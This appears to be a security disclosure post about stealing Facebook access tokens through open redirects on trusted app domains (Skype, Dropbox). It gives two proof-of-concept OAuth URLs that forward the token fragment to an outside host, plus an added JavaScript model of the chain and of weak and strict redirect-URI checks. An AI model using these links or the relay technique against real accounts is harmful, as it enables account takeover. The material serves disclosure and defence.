Continuing the hacking method used in the last two OAuth flaws (mentioned here), this time the attack abuses a redirection flaw on the app's side, reached through the “redirect_uri” / “next” parameter of the Facebook OAuth dialog, to steal the access_token of Facebook users. In both proofs of concept below, “next” points at a page on a domain Facebook trusts for that app (a metrics.skype.com endpoint whose “url” parameter forwards the browser to files.nirgoldshlager.com, and a user-hosted file on www.dropbox.com). Because the dialog is called with response_type=token, Facebook appends the access_token to that URL as a fragment, and the fragment rides along when the trusted page forwards the browser to the attacker's host.
POC (Using Skype app) : https://www.facebook.com/dialog/permissions.request?app_id=260273468396&display=page&next=http://metrics.skype.com/b/ss/skypeglobalmobile/5.4/REDIR/?url=http://files.nirgoldshlager.com&response_type=token&fbconnect=1
POC (Using Dropbox app) : https://www.facebook.com/dialog/permissions.request?app_id=210019893730&display=page&next=https://www.dropbox.com/u/68182951/redirect3.html&response_type=token&perms=email&fbconnect=1
The purpose of the hacker is simply to steal the victim's access_token through these Facebook OAuth flaws, so that he can take full control of the victim's account remotely without ever knowing the password.
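The redirect chain described above, as an added example that is not part of the original post or of Facebook's, Skype's or Dropbox's code. It models three things: the browser rule that a URL fragment survives a 3xx redirect whose Location has no fragment of its own (which is why the token reaches the final host), the host-suffix style of “next” validation that lets a page on a trusted domain be used as a relay, and the exact-match validation that would refuse it. The Skype POC URL is taken from the post; the token value, the placeholder registered redirect URI and the assumed behaviour of the REDIR endpoint (that it forwards to whatever its “url” parameter says) are assumptions for illustration.

```javascript
// Added example: models the token leak through a redirect on a trusted app domain.
// Not code from the original post or from any of the apps it names.

// Facebook's implicit flow (response_type=token) returns the token in the fragment of `next`.
// The token value is made up for this example.
function buildCallback(nextUrl, token) {
  return nextUrl + "#access_token=" + token + "&expires_in=5183943";
}

// Browser behaviour on a 3xx: if the Location header has no fragment, the fragment of the
// request URL is carried over to the new location (RFC 7231 7.1.2, Fetch redirect handling).
function followRedirect(requestUrl, locationHeader) {
  const req = new URL(requestUrl);
  const target = new URL(locationHeader, requestUrl);
  if (!target.hash && req.hash) target.hash = req.hash;
  return target.href;
}

// Assumed behaviour of an open redirector such as the REDIR endpoint in the Skype POC:
// send the browser wherever the `url` query parameter points, with no allow-list.
function openRedirectorLocation(requestUrl) {
  return new URL(requestUrl).searchParams.get("url");
}

// What the attacker's landing page reads out of its own URL.
function extractToken(landingUrl) {
  const hash = new URL(landingUrl).hash.replace(/^#/, "");
  return new URLSearchParams(hash).get("access_token");
}

// Weak check: any host under the app's registered domain is accepted. The Skype POC passes
// because metrics.skype.com is a skype.com host, even though its endpoint forwards elsewhere;
// the Dropbox POC passes the same way because user files are served from www.dropbox.com.
function allowedByDomain(nextUrl, appDomain) {
  let host;
  try { host = new URL(nextUrl).hostname; } catch (e) { return false; }
  return host === appDomain || host.endsWith("." + appDomain);
}

// Strict check: `next` must equal a pre-registered redirect URI (scheme, host, path exactly),
// and may carry no query string or fragment of its own, so a relay endpoint taking a
// `url` parameter cannot be registered or smuggled in.
function allowedByExactMatch(nextUrl, registeredUris) {
  let u;
  try { u = new URL(nextUrl); } catch (e) { return false; }
  if (u.search || u.hash) return false;
  const norm = u.origin + u.pathname;
  return registeredUris.some(function (r) {
    const reg = new URL(r);
    return reg.origin + reg.pathname === norm;
  });
}

// Walk the Skype POC end to end: Facebook -> metrics.skype.com -> files.nirgoldshlager.com.
function demoSkypePoc() {
  const next = "http://metrics.skype.com/b/ss/skypeglobalmobile/5.4/REDIR/?url=http://files.nirgoldshlager.com";
  const afterFacebook = buildCallback(next, "EXAMPLE_TOKEN");
  const landing = followRedirect(afterFacebook, openRedirectorLocation(afterFacebook));
  return {
    landing: landing,
    token: extractToken(landing),
    weakCheckPasses: allowedByDomain(next, "skype.com"),
    // Placeholder registered URI, assumed for the example.
    strictCheckPasses: allowedByExactMatch(next, ["http://metrics.skype.com/b/ss/skypeglobalmobile/5.4/REDIR/"]),
  };
}

console.log(demoSkypePoc());
```

Run it with node: the leaked token lands at files.nirgoldshlager.com/#access_token=EXAMPLE_TOKEN..., the domain check says the POC URL was fine, and the exact-match check rejects it because of the query string. The same logic applies to the Dropbox POC: a dropbox.com host passes the weak check while a user-uploaded redirect3.html does the forwarding.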
Note: The flaw was reported to the Facebook security team by Nir Goldshlager, but it cannot be fixed by the Facebook team alone, because the redirection mistakes live in the apps and app developers are responsible for their own code. The issue therefore remains unfixed for millions of other apps.